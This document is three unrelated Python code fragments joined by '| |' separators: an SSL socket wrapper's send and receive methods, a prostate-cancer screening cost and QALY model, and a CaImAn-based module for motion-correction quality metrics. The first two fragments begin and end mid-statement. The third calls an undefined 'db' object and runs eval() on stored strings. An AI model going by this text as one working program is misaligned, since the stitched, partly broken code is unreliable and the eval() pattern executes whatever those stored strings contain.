except SSLWantReadError:
if self.timeout == 0.0:
return 0
self._wait(self._read_event)
except SSLWantWriteError:
if self.timeout == 0.0:
return 0
self._wait(self._write_event)
else:
return socket.send(self, data, flags, timeout)
def sendto(self, data, flags_or_addr, addr=None):
self._checkClosed()
if self._sslobj:
raise ValueError("sendto not allowed on instances of %s" %
self.__class__)
elif addr is None:
return socket.sendto(self, data, flags_or_addr)
else:
return socket.sendto(self, data, flags_or_addr, addr)
def sendmsg(self, *args, **kwargs):
# Ensure programs don't send data unencrypted if they try to
# use this method.
raise NotImplementedError("sendmsg not allowed on instances of %s" %
self.__class__)
def sendall(self, data, flags=0):
self._checkClosed()
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to sendall() on %s" %
self.__class__)
amount = len(data)
count = 0
while (count < amount):
v = self.send(data[count:])
count += v
return amount
else:
return socket.sendall(self, data, flags)
def recv(self, buflen=1024, flags=0):
self._checkClosed()
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to recv() on | |
t_deaths_pca_age = t_deaths_sc_pca_age + t_deaths_ns_pca_age
# Healthy life-years (screened arm)
lyrs_healthy_sc_nodiscount_age = (healthy_sc
- (0.5 * (healthy_death_other_sc+pca_incidence_sc)))
lyrs_healthy_sc_discount_age = lyrs_healthy_sc_nodiscount_age * discount_factor[:total_cycles]
(s_lyrs_healthy_sc_discount_age,
m_lyrs_healthy_sc_discount_age,
t_lyrs_healthy_sc_discount_age) = outcomes(lyrs_healthy_sc_discount_age)
# Healthy life-years (non-screened arm)
lyrs_healthy_ns_nodiscount_age = (healthy_ns
- (0.5 * (healthy_death_other_ns+pca_incidence_ns)))
lyrs_healthy_ns_discount_age = lyrs_healthy_ns_nodiscount_age * discount_factor[:total_cycles]
(s_lyrs_healthy_ns_discount_age,
m_lyrs_healthy_ns_discount_age,
t_lyrs_healthy_ns_discount_age) = outcomes(lyrs_healthy_ns_discount_age)
# Total healthy life-years
lyrs_healthy_nodiscount_age = lyrs_healthy_sc_nodiscount_age + lyrs_healthy_ns_nodiscount_age
(s_lyrs_healthy_nodiscount_age,
m_lyrs_healthy_nodiscount_age,
t_lyrs_healthy_nodiscount_age) = outcomes(lyrs_healthy_nodiscount_age)
lyrs_healthy_discount_age = lyrs_healthy_nodiscount_age * discount_factor[:total_cycles]
(s_lyrs_healthy_discount_age,
m_lyrs_healthy_discount_age,
t_lyrs_healthy_discount_age) = outcomes(lyrs_healthy_discount_age)
# Life-years with prostate cancer in screened arm
lyrs_pca_sc_discount = lyrs_pca_sc_nodiscount * discount_factor[:total_cycles]
(s_lyrs_pca_sc_discount_age,
m_lyrs_pca_sc_discount_age,
t_lyrs_pca_sc_discount_age) = outcomes(lyrs_pca_sc_discount)
# Life-years with prostate cancer in non-screened arm
lyrs_pca_ns_discount = lyrs_pca_ns_nodiscount * discount_factor[:total_cycles]
(s_lyrs_pca_ns_discount_age,
m_lyrs_pca_ns_discount_age,
t_lyrs_pca_ns_age) = outcomes(lyrs_pca_ns_discount)
# Life-years with prostate cancer in both arms
lyrs_pca_nodiscount_age = lyrs_pca_sc_nodiscount + lyrs_pca_ns_nodiscount
lyrs_pca_discount_age = lyrs_pca_sc_discount + lyrs_pca_ns_discount
(s_lyrs_pca_discount_age,
m_lyrs_pca_discount_age,
t_lyrs_pca_discount_age) = outcomes(lyrs_pca_discount_age)
# Total life-years
##################
lyrs_nodiscount_age = lyrs_healthy_nodiscount_age + lyrs_pca_nodiscount_age
(s_lyrs_nodiscount_age,
m_lyrs_nodiscount_age,
t_lyrs_nodiscount_age) = outcomes(lyrs_nodiscount_age)
lyrs_discount_age = lyrs_healthy_discount_age + lyrs_pca_discount_age
(s_lyrs_discount_age,
m_lyrs_discount_age,
t_lyrs_discount_age) = outcomes(lyrs_discount_age)
# QALYs (healthy life) - screened arm
qalys_healthy_sc_nodiscount_age = lyrs_healthy_sc_nodiscount_age * utility_background_psa[:,year-45:]
qalys_healthy_sc_discount_age = lyrs_healthy_sc_discount_age * utility_background_psa[:,year-45:]
(s_qalys_healthy_sc_discount_age,
m_qalys_healthy_sc_discount_age,
t_qalys_healthy_sc_discount_age) = outcomes(qalys_healthy_sc_discount_age)
# QALYs (healthy life) - non-screened arm
qalys_healthy_ns_nodiscount_age = lyrs_healthy_ns_nodiscount_age * utility_background_psa[:,year-45:]
qalys_healthy_ns_discount_age = lyrs_healthy_ns_discount_age * utility_background_psa[:,year-45:]
(s_qalys_healthy_ns_discount_age,
m_qalys_healthy_ns_discount_age,
t_qalys_healthy_ns_discount_age) = outcomes(qalys_healthy_ns_discount_age)
# Total QALYs (healthy life)
qalys_healthy_nodiscount_age = lyrs_healthy_nodiscount_age * utility_background_psa[:,year-45:]
qalys_healthy_discount_age = lyrs_healthy_discount_age * utility_background_psa[:,year-45:]
(s_qalys_healthy_discount_age,
m_qalys_healthy_discount_age,
t_qalys_healthy_discount_age) = outcomes(qalys_healthy_discount_age)
# QALYS with prostate cancer - screened arm
qalys_pca_sc_nodiscount_age = lyrs_pca_sc_nodiscount * pca_incidence_utility_psa[:,year-45:]
qalys_pca_sc_discount_age = lyrs_pca_sc_discount * pca_incidence_utility_psa[:,year-45:]
(s_qalys_pca_sc_discount_age,
m_qalys_pca_sc_discount_age,
t_qalys_pca_sc_discount_age) = outcomes(qalys_pca_sc_discount_age)
# QALYS with prostate cancer - non-screened arm
qalys_pca_ns_nodiscount_age = lyrs_pca_ns_nodiscount * pca_incidence_utility_psa[:,year-45:]
qalys_pca_ns_discount_age = lyrs_pca_ns_discount * pca_incidence_utility_psa[:,year-45:]
(s_qalys_pca_ns_discount_age,
m_qalys_pca_ns_discount_age,
t_qalys_pca_ns_discount_age) = outcomes(qalys_pca_ns_discount_age)
# Total QALYS with prostate cancer
qalys_pca_nodiscount_age = lyrs_pca_nodiscount_age * pca_incidence_utility_psa[:,year-45:]
qalys_pca_discount_age = lyrs_pca_discount_age * pca_incidence_utility_psa[:,year-45:]
(s_qalys_pca_discount_age,
m_qalys_pca_discount_age,
t_qalys_pca_discount_age) = outcomes(qalys_pca_discount_age)
# Total QALYs
#############
qalys_nodiscount_age = qalys_healthy_nodiscount_age + qalys_pca_nodiscount_age
(s_qalys_nodiscount_age,
m_qalys_nodiscount_age,
t_qalys_nodiscount_age) = outcomes(qalys_nodiscount_age)
qalys_discount_age = qalys_healthy_discount_age + qalys_pca_discount_age
(s_qalys_discount_age,
m_qalys_discount_age,
t_qalys_discount_age) = outcomes(qalys_discount_age)
# Costs of PSA testing in non-screened arm
n_psa_tests_ns_age = ((pca_incidence_ns / p_suspected_ns[:,year-45:])
+ ((pca_incidence_ns * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])) * n_psa_tests[:,year-45:]
cost_psa_testing_ns_nodiscount_age = n_psa_tests_ns_age * cost_psa[:,year-45:] * relative_cost_clinically_detected[:,year-45:]
(s_cost_psa_testing_ns_nodiscount_age,
m_cost_psa_testing_ns_nodiscount_age,
t_cost_psa_testing_ns_nodiscount_age) = outcomes(cost_psa_testing_ns_nodiscount_age)
cost_psa_testing_ns_discount_age = cost_psa_testing_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_psa_testing_ns_discount_age,
m_cost_psa_testing_ns_discount_age,
t_cost_psa_testing_ns_discount_age) = outcomes(cost_psa_testing_ns_discount_age)
# Costs of PSA testing in screened arm (PSA screening every four years)
# PSA tests during screened and non-screened period
if year < 55:
# Assuming all cancers are clinically detected as these cohorts
# are not eligible for screening (hence p_suspected_ns)
# This uses 1-uptake biopsy as the original part of the equation works out
# the number of biopsies which is then multiplied by n_psa_tests to get the number of PSA tests
n_psa_tests_sc_age = (((pca_incidence_sc / p_suspected_ns[:,year-45:])
+ ((pca_incidence_sc * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:]))
* uptake_psa
* n_psa_tests[:,year-45:])
cost_psa_testing_sc_nodiscount_age = (n_psa_tests_sc_age
* cost_psa[:,year-45:]
* relative_cost_clinically_detected[:,year-45:])
if year > 54:
# Get the screened years
lyrs_healthy_screened_nodiscount_age = np.array([np.zeros(length_df)] * sims)
lyrs_healthy_screened_nodiscount_age[:,:length_screen] = lyrs_healthy_sc_nodiscount_age[:,:length_screen].copy()
lyrs_healthy_screened_nodiscount_age[:,length_screen:] = 0
# Population-level PSA testing during screening phase
n_psa_tests_screened_age = lyrs_healthy_screened_nodiscount_age * uptake_psa / 4
# Assuming all cancers are clinically detected in the post-screening phase
n_psa_tests_post_screening_age = (((pca_incidence_post_screening / p_suspected_ns[:,year-45:])
+ ((pca_incidence_post_screening * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:]))
* uptake_psa
* n_psa_tests[:,year-45:])
# Total PSA tests
n_psa_tests_sc_age = (n_psa_tests_screened_age + n_psa_tests_post_screening_age)
cost_psa_testing_screened_age = n_psa_tests_screened_age * cost_psa[:,year-45:]
cost_psa_testing_post_screening_age = (n_psa_tests_post_screening_age
* cost_psa[:,year-45:]
* relative_cost_clinically_detected[:,year-45:])
cost_psa_testing_sc_nodiscount_age = (cost_psa_testing_screened_age
+ cost_psa_testing_post_screening_age)
(s_cost_psa_testing_sc_nodiscount_age,
m_cost_psa_testing_sc_nodiscount_age,
t_cost_psa_testing_sc_nodiscount_age) = outcomes(cost_psa_testing_sc_nodiscount_age)
cost_psa_testing_sc_discount_age = cost_psa_testing_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_psa_testing_sc_discount_age,
m_cost_psa_testing_sc_discount_age,
t_cost_psa_testing_sc_discount_age) = outcomes(cost_psa_testing_sc_discount_age)
# Total costs of PSA testing
############################
n_psa_tests_age = n_psa_tests_ns_age + n_psa_tests_sc_age
(s_n_psa_tests_age,
m_n_psa_tests_age,
total_n_psa_tests_age) = outcomes(n_psa_tests_age)
cost_psa_testing_nodiscount_age = cost_psa_testing_ns_nodiscount_age + cost_psa_testing_sc_nodiscount_age
(s_cost_psa_testing_nodiscount_age,
m_cost_psa_testing_nodiscount_age,
t_cost_psa_testing_nodiscount_age) = outcomes(cost_psa_testing_nodiscount_age)
cost_psa_testing_discount_age = cost_psa_testing_ns_discount_age + cost_psa_testing_sc_discount_age
(s_cost_psa_testing_discount_age,
m_cost_psa_testing_discount_age,
t_cost_psa_testing_discount_age) = outcomes(cost_psa_testing_discount_age)
# Costs of biopsy - screened arm
if year < 55:
# Assuming all cancers are clinically detected as these cohorts
# are not eligible for screening (hence p_suspected_ns)
n_biopsies_sc_age = pca_incidence_sc / p_suspected_ns[:,year-45:]
# Costs include the costs of those who turn down biopsy
cost_biopsy_sc_nodiscount_age = (((pca_incidence_sc / p_suspected_ns[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_sc * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])
* cost_refuse_biopsy[:,year-45:])
* relative_cost_clinically_detected[:,year-45:])
if year > 54:
# Screen-detected cancers
n_biopsies_screened_age = pca_incidence_screened / p_suspected[:,year-45:]
cost_biopsy_screened_nodiscount_age = (((pca_incidence_screened / p_suspected[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_screened * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy[:,year-45:])
* cost_refuse_biopsy[:,year-45:]))
# Assuming all cancers are clinically detected in the post-screening phase
n_biopsies_post_screening_age = pca_incidence_post_screening / p_suspected_ns[:,year-45:]
cost_biopsies_post_screening_nodiscount_age = (((pca_incidence_post_screening / p_suspected_ns[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_post_screening * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])
* cost_refuse_biopsy[:,year-45:])
* relative_cost_clinically_detected[:,year-45:])
# Total biopsies
n_biopsies_sc_age = (n_biopsies_screened_age + n_biopsies_post_screening_age)
# Total cost of biopsies
cost_biopsy_sc_nodiscount_age = (cost_biopsy_screened_nodiscount_age
+ cost_biopsies_post_screening_nodiscount_age)
(s_cost_biopsy_sc_nodiscount_age,
m_cost_biopsy_sc_nodiscount_age,
t_cost_biopsy_sc_nodiscount_age) = outcomes(cost_biopsy_sc_nodiscount_age)
cost_biopsy_sc_discount_age = cost_biopsy_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_biopsy_sc_discount_age,
m_cost_biopsy_sc_discount_age,
t_cost_biopsy_sc_discount_age) = outcomes(cost_biopsy_sc_discount_age)
# Costs of biopsy - non-screened arm
n_biopsies_ns_age = pca_incidence_ns / p_suspected_ns[:,year-45:]
cost_biopsy_ns_nodiscount_age = (((pca_incidence_ns / p_suspected_ns[:,year-45:])
* cost_biopsy[:,year-45:])
+ (((pca_incidence_ns * (1-uptake_biopsy[year-45:]))
/ p_suspected_refuse_biopsy_ns[:,year-45:])
* cost_refuse_biopsy[:,year-45:])
* relative_cost_clinically_detected[:,year-45:])
(s_cost_biopsy_ns_nodiscount_age,
m_cost_biopsy_ns_nodiscount_age,
t_cost_biopsy_ns_nodiscount_age) = outcomes(cost_biopsy_ns_nodiscount_age)
cost_biopsy_ns_discount_age = cost_biopsy_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_biopsy_ns_discount_age,
m_cost_biopsy_ns_discount_age,
t_cost_biopsy_ns_discount_age) = outcomes(cost_biopsy_ns_discount_age)
# Total costs of biopsy
#######################
n_biopsies_age = n_biopsies_sc_age + n_biopsies_ns_age
(s_n_biopsies_age,
m_n_biopsies_age,
total_n_biopsies_age) = outcomes(n_biopsies_age)
cost_biopsy_nodiscount_age = cost_biopsy_sc_nodiscount_age + cost_biopsy_ns_nodiscount_age
(s_cost_biopsy_nodiscount_age,
m_cost_biopsy_nodiscount_age,
t_cost_biopsy_nodiscount_age) = outcomes(cost_biopsy_nodiscount_age)
cost_biopsy_discount_age = cost_biopsy_sc_discount_age + cost_biopsy_ns_discount_age
(s_cost_biopsy_discount_age,
m_cost_biopsy_discount_age,
t_cost_biopsy_discount_age) = outcomes(cost_biopsy_discount_age)
# Cost of staging in the screened arm
if year < 55:
cost_staging_sc_nodiscount_age = (cost_assessment
* psa_stage_adv.T
* pca_incidence_sc.T
* relative_cost_clinically_detected[:,year-45:].T).T
if year > 54:
cost_staging_screened_nodiscount_age = (cost_assessment
* psa_stage_screened_adv.T
* pca_incidence_screened.T).T
cost_staging_post_screening_nodiscount_age = (cost_assessment
* psa_stage_adv.T
* pca_incidence_post_screening.T
* relative_cost_clinically_detected[:,year-45:].T).T
cost_staging_sc_nodiscount_age = (cost_staging_screened_nodiscount_age
+ cost_staging_post_screening_nodiscount_age)
(s_cost_staging_sc_nodiscount_age,
m_cost_staging_sc_nodiscount_age,
t_cost_staging_sc_nodiscount_age) = outcomes(cost_staging_sc_nodiscount_age)
cost_staging_sc_discount_age = cost_staging_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_staging_sc_discount_age,
m_cost_staging_sc_discount_age,
t_cost_staging_sc_discount_age) = outcomes(cost_staging_sc_discount_age)
# Cost of staging in the non-screened arm
cost_staging_ns_nodiscount_age = (cost_assessment
* psa_stage_adv.T
* pca_incidence_ns.T
* relative_cost_clinically_detected[:,year-45:].T).T
(s_cost_staging_ns_nodiscount_age,
m_cost_staging_ns_nodiscount_age,
t_cost_staging_ns_nodiscount_age) = outcomes(cost_staging_ns_nodiscount_age)
cost_staging_ns_discount_age = cost_staging_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_staging_ns_discount_age,
m_cost_staging_ns_discount_age,
t_cost_staging_ns_discount_age) = outcomes(cost_staging_ns_discount_age)
# Total costs of staging
########################
cost_staging_nodiscount_age = cost_staging_sc_nodiscount_age + cost_staging_ns_nodiscount_age
(s_cost_staging_nodiscount_age,
m_cost_staging_nodiscount_age,
t_cost_staging_nodiscount_age) = outcomes(cost_staging_nodiscount_age)
cost_staging_discount_age = cost_staging_sc_discount_age + cost_staging_ns_discount_age
(s_cost_staging_discount_age,
m_cost_staging_discount_age,
t_cost_staging_discount_age) = outcomes(cost_staging_discount_age)
# Cost of treatment in screened arm
(s_cost_tx_sc_nodiscount_age,
m_cost_tx_sc_nodiscount_age,
t_cost_tx_sc_nodiscount_age) = outcomes(costs_tx_sc)
cost_tx_sc_nodiscount_age = costs_tx_sc * discount_factor[:total_cycles]
(s_cost_tx_sc_discount_age,
m_cost_tx_sc_discount_age,
t_cost_tx_sc_discount_age) = outcomes(cost_tx_sc_nodiscount_age)
# Cost of treatment in non-screened arm
(s_cost_tx_ns_nodiscount_age,
m_cost_tx_ns_nodiscount_age,
t_cost_tx_ns_nodiscount_age) = outcomes(costs_tx_ns)
cost_tx_ns_nodiscount_age = costs_tx_ns * discount_factor[:total_cycles]
(s_cost_tx_ns_discount_age,
m_cost_tx_ns_discount_age,
t_cost_tx_ns_discount_age) = outcomes(cost_tx_ns_nodiscount_age)
# Total costs of treatment
##########################
cost_tx_nodiscount_age = costs_tx_sc + costs_tx_ns
(s_cost_tx_nodiscount_age,
m_cost_tx_nodiscount_age,
t_cost_tx_nodiscount_age) = outcomes(cost_tx_nodiscount_age)
cost_tx_discount_age = cost_tx_nodiscount_age * discount_factor[:total_cycles]
(s_cost_tx_discount_age,
m_cost_tx_discount_age,
t_cost_tx_discount_age) = outcomes(cost_tx_discount_age)
# Costs of palliation and death in screened arm
cost_eol_sc_nodiscount_age = (pca_death_costs * pca_death_sc.T).T
(s_cost_eol_sc_nodiscount_age,
m_cost_eol_sc_nodiscount_age,
t_cost_eol_sc_nodiscount_age) = outcomes(cost_eol_sc_nodiscount_age)
cost_eol_sc_discount_age = cost_eol_sc_nodiscount_age * discount_factor[:total_cycles]
(s_cost_eol_sc_discount_age,
m_cost_eol_sc_discount_age,
t_cost_eol_sc_discount_age) = outcomes(cost_eol_sc_discount_age)
# Costs of palliation and death in non-screened arm
cost_eol_ns_nodiscount_age = (pca_death_costs * pca_death_ns.T).T
(s_cost_eol_ns_nodiscount_age,
m_cost_eol_ns_nodiscount_age,
t_cost_eol_ns_nodiscount_age) = outcomes(cost_eol_ns_nodiscount_age)
cost_eol_ns_discount_age = cost_eol_ns_nodiscount_age * discount_factor[:total_cycles]
(s_cost_eol_ns_discount_age,
m_cost_eol_ns_discount_age,
t_cost_eol_ns_discount_age) = outcomes(cost_eol_ns_discount_age)
# Total costs of palliation and death
cost_eol_nodiscount_age = cost_eol_sc_nodiscount_age + cost_eol_ns_nodiscount_age
(s_cost_eol_nodiscount_age,
m_cost_eol_nodiscount_age,
t_cost_eol_nodiscount_age) = outcomes(cost_eol_nodiscount_age)
cost_eol_discount_age = cost_eol_sc_discount_age + cost_eol_ns_discount_age
(s_cost_eol_discount_age,
m_cost_eol_discount_age,
t_cost_eol_discount_age) = outcomes(cost_eol_discount_age)
# TOTAL COSTS AGE-BASED SCREENING
#################################
cost_nodiscount_age = (cost_psa_testing_nodiscount_age
+ cost_biopsy_nodiscount_age
+ cost_staging_nodiscount_age
+ cost_tx_nodiscount_age
+ cost_eol_nodiscount_age)
s_cost_nodiscount_age, m_cost_nodiscount_age, t_cost_nodiscount_age = outcomes(cost_nodiscount_age)
cost_discount_age = (cost_psa_testing_discount_age
+ cost_biopsy_discount_age
+ cost_staging_discount_age
+ cost_tx_discount_age
+ cost_eol_discount_age)
s_cost_discount_age, m_cost_discount_age, t_cost_discount_age = outcomes(cost_discount_age)
# Generate a mean dataframe
age_matrix = [age, m_cases_age, m_cases_sc_detected_age,
m_cases_post_screening_age, m_overdiagnosis_age, m_deaths_other_age, m_deaths_pca_age,
m_pca_alive_ns, m_healthy_age, m_lyrs_healthy_nodiscount_age,
m_lyrs_healthy_discount_age, m_lyrs_pca_discount_age, m_lyrs_discount_age,
m_qalys_healthy_discount_age, m_qalys_pca_discount_age, m_qalys_discount_age,
m_cost_psa_testing_discount_age, m_cost_biopsy_discount_age, m_cost_staging_discount_age,
m_cost_tx_discount_age, m_cost_eol_discount_age, m_cost_discount_age]
age_columns = ['age', 'pca_cases', 'screen-detected cases',
'post-screening cases', 'overdiagnosis', 'deaths_other', 'deaths_pca',
'pca_alive', 'healthy','lyrs_healthy_nodiscount', 'lyrs_healthy_discount',
'lyrs_pca_discount', 'total_lyrs_discount',
'qalys_healthy_discount', 'qalys_pca_discount', 'total_qalys_discount',
'cost_psa_testing_discount', 'cost_biopsy_discount', 'cost_staging_discount',
'cost_treatment_discount', 'costs_eol_discount', 'total_cost_discount']
age_cohort = pd.DataFrame(age_matrix, index = age_columns).T
t_parameters_age = [year, t_cases_age, t_overdiagnosis_age,
t_deaths_pca_age, t_deaths_other_age,
t_lyrs_healthy_discount_age, t_lyrs_pca_discount_age,
t_lyrs_nodiscount_age, t_lyrs_discount_age, t_qalys_healthy_discount_age,
t_qalys_pca_discount_age, t_qalys_nodiscount_age, t_qalys_discount_age,
t_cost_psa_testing_discount_age, t_cost_psa_testing_discount_age,
t_cost_biopsy_nodiscount_age, t_cost_biopsy_discount_age,
t_cost_staging_nodiscount_age, t_cost_staging_discount_age,
t_cost_tx_nodiscount_age, t_cost_tx_discount_age,
t_cost_eol_nodiscount_age, t_cost_eol_discount_age,
t_cost_nodiscount_age, t_cost_discount_age,
total_n_psa_tests_age, total_n_biopsies_age]
columns_age = ['cohort_age_at_start', 'pca_cases', 'overdiagnosis',
'pca_deaths', 'deaths_other_causes',
'lyrs_healthy_discounted', 'lyrs_pca_discounted',
'lyrs_undiscounted', 'lyrs_discounted','qalys_healthy_discounted',
'qalys_pca_discounted', 'qalys_undiscounted', 'qalys_discounted',
'cost_psa_testing_undiscounted', 'cost_psa_testing_discounted',
'cost_biopsy_undiscounted', 'cost_biopsy_discounted',
'cost_staging_undiscounted', 'cost_staging_discounted',
'cost_treatment_undiscounted', 'cost_treatment_discounted',
'cost_eol_undiscounted', 'cost_eol_discounted',
'costs_undiscounted', 'costs_discounted', 'n_psa_tests', 'n_biopsies']
outcomes_age_psa = pd.DataFrame(t_parameters_age, index = columns_age).T
s_qalys_discount_age_df = pd.DataFrame(s_qalys_discount_age)
s_cost_discount_age_df = pd.DataFrame(s_cost_discount_age)
parameters_age = [s_qalys_discount_age, s_cost_discount_age,
s_deaths_pca_age, s_overdiagnosis_age,
age_cohort, outcomes_age_psa]
for index, parameter in enumerate(parameter_list_age):
parameter = | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author:<NAME>, <NAME>
This module will concentrate all the functions related to quality measurements for the pipeline and also make some ploting
for comparing those measures.
"""
import os
import logging
import pickle
import numpy as np
import datetime
import caiman as cm
import pylab as pl
from caiman.motion_correction import MotionCorrect
import scipy
import cv2
from src.Database.database_connection import database
mycursor = database.cursor()
def get_metrics_motion_correction(row, crispness=False, local_correlations=False, correlations=False,
optical_flow=False):
'''
This is a wrapper function to compute (a selection of) the metrics provided
by CaImAn for motion correction.
input -> row : dictionary with all relevant file-paths
crispness : bool variable to indicate whether crispness is supposed to be computed
local_correlations -> bool variable to indicate whether local_correlations is supposed to be computed
correlations - > bool variable to indicate whether correlations is supposed to be computed
optical_flow -> bool variable to indicate whether optical_flow is supposed to be computed
output -> row_local : dictionary with new outputs directions
'''
row_local = row.copy()
index = row_local.name
# Get the parameters, motion correction output and cropping output of this row
parameters = eval(row_local.loc['motion_correction_parameters'])
output = eval(row_local.loc['motion_correction_output'])
cropping_output = eval(row_local.loc['cropping_output'])
# Get the metrics file path
metrics_pkl_file_path = output['meta']['metrics']['other']
# Load the already available metrics
with open(metrics_pkl_file_path, 'rb') as f:
try:
meta_dict = pickle.load(f)
except:
meta_dict = {}
# ORIGINAL MOVIE
logging.info(f'{index} Computing metrics for original movie')
t0 = datetime.datetime.today()
fname_orig = cropping_output['main']
tmpl_orig, crispness_orig, crispness_corr_orig, correlations_orig, img_corr_orig, flows_orig, norms_orig = compute_metrics_motion_correction(
fname_orig, swap_dim=False, winsize=100, play_flow=False,
resize_fact_flow=.2, one_photon=True, crispness=crispness,
correlations=correlations, local_correlations=local_correlations,
optical_flow=optical_flow)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
output['meta']['metrics']['original'] = {
'crispness': crispness_orig,
'crispness_corr': crispness_corr_orig
}
meta_dict['original'] = db.remove_None_from_dict({
'correlations': correlations_orig,
'local_correlations': img_corr_orig,
'flows': flows_orig,
'norms': norms_orig})
output['meta']['duration']['metrics_orig'] = dt
logging.info(f'{index} Computed metrics for original movie. dt = {dt} min')
# RIGID MOVIE
if not parameters['pw_rigid'] or (parameters['pw_rigid'] and 'alternate' in output):
logging.info(f'{index} Computing metrics for rigid movie')
t0 = datetime.datetime.today()
fname_rig = output['main'] if not parameters['pw_rigid'] else output['alternate']
tmpl_rig, crispness_rig, crispness_corr_rig, correlations_rig, img_corr_rig, flows_rig, norms_rig = compute_metrics_motion_correction(
fname_rig, swap_dim=False, winsize=100, play_flow=False,
resize_fact_flow=.2, one_photon=True, crispness=crispness,
correlations=correlations, local_correlations=local_correlations,
optical_flow=optical_flow)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
output['meta']['metrics']['rigid'] = {
'crispness': crispness_rig,
'crispness_corr': crispness_corr_rig
}
meta_dict['rigid'] = db.remove_None_from_dict({
'correlations': correlations_rig,
'local_correlations': img_corr_rig,
'flows': flows_rig,
'norms': norms_rig})
output['meta']['duration']['metrics_rig'] = dt
logging.info(f'{index} Computed metrics for rigid movie. dt = {dt} min')
if parameters['pw_rigid']:
logging.info(f'{index} Computing metrics for pw-rigid movie')
t0 = datetime.datetime.today()
fname_els = output['main']
tmpl_els, crispness_els, crispness_corr_els, correlations_els, img_corr_els, flows_els, norms_els = compute_metrics_motion_correction(
fname_els, swap_dim=False,
resize_fact_flow=.2, one_photon=True, crispness=crispness,
correlations=correlations, local_correlations=local_correlations,
optical_flow=optical_flow)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
output['meta']['metrics']['pw_rigid'] = {
'crispness': crispness_els,
'crispness_corr': crispness_corr_els
}
meta_dict['pw_rigid'] = db.remove_None_from_dict({
'correlations': correlations_els,
'local_correlations': img_corr_els,
'flows': flows_els,
'norms': norms_els})
output['meta']['duration']['metrics_els'] = dt
logging.info(f'{index} Computed metrics for pw-rigid movie. dt = {dt} min')
# Save the metrics in a pkl file
logging.info(f'{index} Saving metrics')
with open(metrics_pkl_file_path, 'wb') as f:
pickle.dump(meta_dict, f)
logging.info(f'{index} Saved metrics')
row_local.loc['motion_correction_output'] = str(output)
return row_local
def compute_metrics_motion_correction(file_name, swap_dim, pyr_scale=.5, levels=3,
winsize=100, iterations=15, poly_n=5, poly_sigma=1.2 / 5, flags=0,
play_flow=False, resize_fact_flow=.2, template=None, save_npz=False,
one_photon=True, crispness=True, correlations=True, local_correlations=True,
optical_flow=True):
'''
This function is actually copied from the CaImAn packages and edited for use in this calcium
imaging analysis pipeline. It contained some abnormalities that we wanted to avoid.
'''
# Logic
if crispness: local_correlations = True
# Load the movie
m = cm.load(file_name)
vmin, vmax = -1, 1
# Check the movie for NaN's which may cause problems
if np.sum(np.isnan(m)) > 0:
logging.info(m.shape)
logging.warning('Movie contains NaN')
raise Exception('Movie contains NaN')
if template is None:
tmpl = cm.motion_correction.bin_median(m)
else:
tmpl = template
if correlations:
logging.debug('Computing correlations')
t0 = datetime.datetime.today()
correlations = []
count = 0
if one_photon:
m_compute = m - np.min(m)
for fr in m_compute:
if count % 100 == 0:
logging.debug(f'Frame {count}')
count += 1
correlations.append(scipy.stats.pearsonr(
fr.flatten(), tmpl.flatten())[0])
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(f'Computed correlations. dt = {dt} min')
else:
correlations = None
if local_correlations:
logging.debug('Computing local correlations')
t0 = datetime.datetime.today()
img_corr = m.local_correlations(eight_neighbours=True, swap_dim=swap_dim)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(f'Computed local correlations. dt = {dt} min')
else:
img_corr = None
if crispness:
logging.debug('Computing crispness')
t0 = datetime.datetime.today()
smoothness = np.sqrt(
np.sum(np.sum(np.array(np.gradient(np.mean(m, 0))) ** 2, 0)))
smoothness_corr = np.sqrt(
np.sum(np.sum(np.array(np.gradient(img_corr)) ** 2, 0)))
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(
f'Computed crispness. dt = {dt} min. Crispness = {smoothness}, crispness corr = {smoothness_corr}.')
else:
smoothness = None
if optical_flow:
logging.debug('Computing optical flow')
t0 = datetime.datetime.today()
m = m.resize(1, 1, resize_fact_flow)
norms = []
flows = []
count = 0
for fr in m:
if count % 100 == 0:
logging.debug(count)
count += 1
flow = cv2.calcOpticalFlowFarneback(
tmpl, fr, None, pyr_scale, levels, winsize, iterations, poly_n, poly_sigma, flags)
if play_flow:
pl.subplot(1, 3, 1)
pl.cla()
pl.imshow(fr, vmin=0, vmax=300, cmap='gray')
pl.title('movie')
pl.subplot(1, 3, 3)
pl.cla()
pl.imshow(flow[:, :, 1], vmin=vmin, vmax=vmax)
pl.title('y_flow')
pl.subplot(1, 3, 2)
pl.cla()
pl.imshow(flow[:, :, 0], vmin=vmin, vmax=vmax)
pl.title('x_flow')
pl.pause(.05)
n = np.linalg.norm(flow)
flows.append(flow)
norms.append(n)
dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes
logging.debug(f'Computed optical flow. dt = {dt} min')
else:
flows = norms = None
if save_npz:
logging.debug('Saving metrics in .npz format')
np.savez(file_name[:-4] + '_metrics', flows=flows, norms=norms, correlations=correlations, smoothness=smoothness,
tmpl=tmpl, smoothness_corr=smoothness_corr, img_corr=img_corr)
